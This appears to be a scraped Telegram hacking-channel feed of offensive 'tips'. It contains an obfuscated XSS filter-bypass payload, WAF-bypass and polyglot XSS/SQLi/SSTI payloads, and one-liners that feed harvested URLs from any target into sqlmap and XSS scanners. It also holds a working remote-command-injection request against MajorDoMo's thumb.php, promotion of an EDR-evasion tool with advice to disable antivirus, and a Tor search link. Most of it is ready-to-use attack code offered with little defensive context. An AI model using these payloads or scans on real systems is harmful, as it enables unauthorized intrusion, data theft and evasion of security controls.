XSS Tip 🥵
If alert() is being converted to ALERT() and you can use
Like onerror="
𐂃='',𐃨=!𐂃+𐂃,𐂝=!𐃨+𐂃,𐃌=𐂃+{},𐁉=𐃨[𐂃++],𐃵=𐃨[𐂓=𐂃],𐀜=++𐂓+𐂃,𐂠=𐃌[𐂓+𐀜],𐃨[𐂠+=𐃌[𐂃]+(𐃨.𐂝+𐃌)[𐂃]+𐂝[𐀜]+𐁉+𐃵+𐃨[𐂓]+𐂠+𐁉+𐃌[𐂃]+𐃵][𐂠](𐂝[𐂃]+𐂝[𐂓]+𐃨[𐀜]+𐃵+𐁉+'(𐂃)')()"
#XSS #tip
——————
0Day.Today
@LearnExploit
@Tech_Army
If alert() is being converted to ALERT() and you can use
Like onerror="
𐂃='',𐃨=!𐂃+𐂃,𐂝=!𐃨+𐂃,𐃌=𐂃+{},𐁉=𐃨[𐂃++],𐃵=𐃨[𐂓=𐂃],𐀜=++𐂓+𐂃,𐂠=𐃌[𐂓+𐀜],𐃨[𐂠+=𐃌[𐂃]+(𐃨.𐂝+𐃌)[𐂃]+𐂝[𐀜]+𐁉+𐃵+𐃨[𐂓]+𐂠+𐁉+𐃌[𐂃]+𐃵][𐂠](𐂝[𐂃]+𐂝[𐂓]+𐃨[𐀜]+𐃵+𐁉+'(𐂃)')()"
#XSS #tip
——————
0Day.Today
@LearnExploit
@Tech_Army
❤3❤🔥3🔥2
This media is not supported in your browser
VIEW IN TELEGRAM
CrimsonEDR
💬
CrimsonEDR is an open-source project engineered to identify specific malware patterns, offering a tool for honing skills in circumventing Endpoint Detection and Response (EDR). By leveraging diverse detection methods, it empowers users to deepen their understanding of security evasion tactics.
🔼 Installation:
⚪️ Install dependancy:
⚪️ Download repository
⚪️ Compile the project:
⚠️ Warning:
Windows Defender and other antivirus programs may flag the DLL as malicious due to its content containing bytes used to verify if the AMSI has been patched. Please ensure to whitelist the DLL or disable your antivirus temporarily when using CrimsonEDR to avoid any interruptions.
💻 Example:
😸 Github
⬇️ Download
🔒
#C #Simulate #Malware #Dev
➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖
📣 T.me/BugCod3
📣 T.me/LearnExploit
CrimsonEDR is an open-source project engineered to identify specific malware patterns, offering a tool for honing skills in circumventing Endpoint Detection and Response (EDR). By leveraging diverse detection methods, it empowers users to deepen their understanding of security evasion tactics.
sudo apt-get install gcc-mingw-w64-x86-64
cd CrimsonEDR;
chmod +x compile.sh;
./compile.sh
Windows Defender and other antivirus programs may flag the DLL as malicious due to its content containing bytes used to verify if the AMSI has been patched. Please ensure to whitelist the DLL or disable your antivirus temporarily when using CrimsonEDR to avoid any interruptions.
.\CrimsonEDRPanel.exe -d C:\Temp\CrimsonEDR.dll -p 1234
LearnExploit
#C #Simulate #Malware #Dev
Please open Telegram to view this post
VIEW IN TELEGRAM
⚡4🔥3❤1👍1
Payload for XSS + SQLi + SSTI/CSTI !
#XSS #SQLI
➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖
📣 T.me/BugCod3
📣 T.me/LearnExploit
'"><svg/onload=prompt(5);>{{7*7}}
' ==> for Sql injection
"><svg/onload=prompt(5);> ==> for XSS
{{7*7}} ==> for SSTI/CSTI
#XSS #SQLI
Please open Telegram to view this post
VIEW IN TELEGRAM
⚡4🔥3❤1
SQLMap from Waybackurls
#Sqlmap #BugBounty #Tips
➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖
📣 T.me/BugCod3
📣 T.me/LearnExploit
waybackurls target | grep -E '\bhttps?://\S+?=\S+' | grep -E '\.php|\.asp' | sort -u | sed 's/\(=[^&]*\)/=/g' | tee urls.txt | sort -u -o urls.txt && cat urls.txt | xargs -I{} sqlmap --technique=T --batch -u "{}"
#Sqlmap #BugBounty #Tips
Please open Telegram to view this post
VIEW IN TELEGRAM
⚡5🔥3❤2👍1
xss oneliner command
⬇️ Download ( Tools )
🔒
🔒
#XSS #BugBounty #Oneliner #Tips
➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖
📣 T.me/BugCod3
📣 T.me/LearnExploit
echo "testphp.vulnweb.com" | waybackurls | egrep -iv ".(jpg|jpeg|gif|css|tif|tiff|png|ttf|woff|woff2|icon|pdf|svg|txt|js)" | urldedupe -s | grep -IE "[?].*[&]?" | grep "=" | unew -p | pvreplace '<sCript>confirm(1)</sCript>, <script>confirm(1)</script>' | xsschecker -match '<sCript>confirm(1)</sCript>, <script>confirm(1)</script>' -vuln
BugCod3
( ZIP )LearnExploit
( BOT )#XSS #BugBounty #Oneliner #Tips
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥4⚡3❤2👍2
#Burpsuite #Pro #Tools
Please open Telegram to view this post
VIEW IN TELEGRAM
⚡4❤2👍2🔥2
CVE-2024-31497: Critical PuTTY Vulnerability Exposes Private Keys
Link
#cve
——————
0Day.Today
@LearnExploit
@Tech_Army
Link
#cve
——————
0Day.Today
@LearnExploit
@Tech_Army
👍1
یه سرچ انجین جالب که میتونین توش مثل گوگل رایت اپ ها و پیلود ها و .... رو پیدا کنید 👌
Link
#writeup #پیشنهادی
——————
0Day.Today
@LearnExploit
@Tech_Army
Link
#writeup #پیشنهادی
——————
0Day.Today
@LearnExploit
@Tech_Army
❤5❤🔥1👍1
SQLMap from Waybackurls ⚡️
waybackurls target | grep -E '\bhttps?://\S+?=\S+' | grep -E '\.php|\.asp' | sort -u | sed 's/\(=[^&]*\)/=/g' | tee urls.txt | sort -u -o urls.txt && cat urls.txt | xargs -I{} sqlmap --technique=T --batch -u "{}"
#sql #sql_injection #tip
——————
0Day.Today
@LearnExploit
@Tech_Army
waybackurls target | grep -E '\bhttps?://\S+?=\S+' | grep -E '\.php|\.asp' | sort -u | sed 's/\(=[^&]*\)/=/g' | tee urls.txt | sort -u -o urls.txt && cat urls.txt | xargs -I{} sqlmap --technique=T --batch -u "{}"
#sql #sql_injection #tip
——————
0Day.Today
@LearnExploit
@Tech_Army
⚡6
VormWeb - Tor search engine ⚡️
volkancfgpi4c7ghph6id2t7vcntenuly66qjt6oedwtjmyj4tkk5oqd.onion
#Tor #Darkweb
——————
0Day.Today
@LearnExploit
@Tech_Army
#Tor #Darkweb
——————
0Day.Today
@LearnExploit
@Tech_Army
👍5❤🔥1
MajorDoMo thumb RCE
#rce #Poc #Exploit
——————
0Day.Today
@LearnExploit
@Tech_Army
GET /modules/thumb/thumb.php?url=cnRzcDovL2EK&debug=1&transport=%7C%7C+%28echo+%27%5BS%5D%27%3B+id%3B+echo+%27%5BE%5D%27%29%23 %3B HTTP/1.1``
#rce #Poc #Exploit
——————
0Day.Today
@LearnExploit
@Tech_Army
👍3❤🔥2
Extract IPS From list of domains and then you can conduct your FUZZ/Manually check them for SDE /BAC , Ports , ..etc
grep -o '[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}'
#Fuzz #tip
——————
0Day.Today
@LearnExploit
@Tech_Army
grep -o '[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}'
#Fuzz #tip
——————
0Day.Today
@LearnExploit
@Tech_Army
👍2⚡1🆒1
Do you know that sqlmap has its own crawler? Run in the background easily:
sqlmap -u 'https://target\.com' --crawl=3 --random-agent --batch --forms --threads=5 --hostname --timeout=15 --retries=1 --time-sec 12
#sql #sql_injection
——————
0Day.Today
@LearnExploit
@Tech_Army
sqlmap -u 'https://target\.com' --crawl=3 --random-agent --batch --forms --threads=5 --hostname --timeout=15 --retries=1 --time-sec 12
#sql #sql_injection
——————
0Day.Today
@LearnExploit
@Tech_Army
⚡4❤🔥1👍1🔥1
Stored Xss payload 🔥
Payload for bypass waf:
<Img Src=OnXSS OnError=confirm("@Learnexploit")>
#xss #Bypass #WAF #Payload
——————
0Day.Today
@LearnExploit
@Tech_Army
Payload for bypass waf:
<Img Src=OnXSS OnError=confirm("@Learnexploit")>
#xss #Bypass #WAF #Payload
——————
0Day.Today
@LearnExploit
@Tech_Army
⚡5
Xss Payload 💎
#xss #Payload
——————
0Day.Today
@LearnExploit
@Tech_Army
j%0Aa%0Av%0Aa%0As%0Ac%0Ar%0Ai%0Ap%0At:console.log(location)
#xss #Payload
——————
0Day.Today
@LearnExploit
@Tech_Army
⚡4
XSS could be be triggers in url itself, no need for parameter injection ⚡️
Payloads:
#Xss #Payload
——————
0Day.Today
@LearnExploit
@Tech_Army
Payloads:
%3Csvg%20onload=alert(%22@Learnexploit88%22)%3E
%3Cimg%20src=x%20onerror=alert(%22@Learnexploit%22)%3E
#Xss #Payload
——————
0Day.Today
@LearnExploit
@Tech_Army
⚡4👍1
🕵️♂️ Human-like Behavior Mimicking: To mimic human-like behavior and avoid detection by anti-bot mechanisms, the tool randomizes user agents for each request. This helps in making the requests appear more natural and reduces the likelihood of being flagged as automated activity.
cd Ominis-Osint
pip install -r requirements.txt
python3 Ominis.py
BugCod3
#Python #Osint #Search #Engin #Tools
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥6⚡2❤2👍2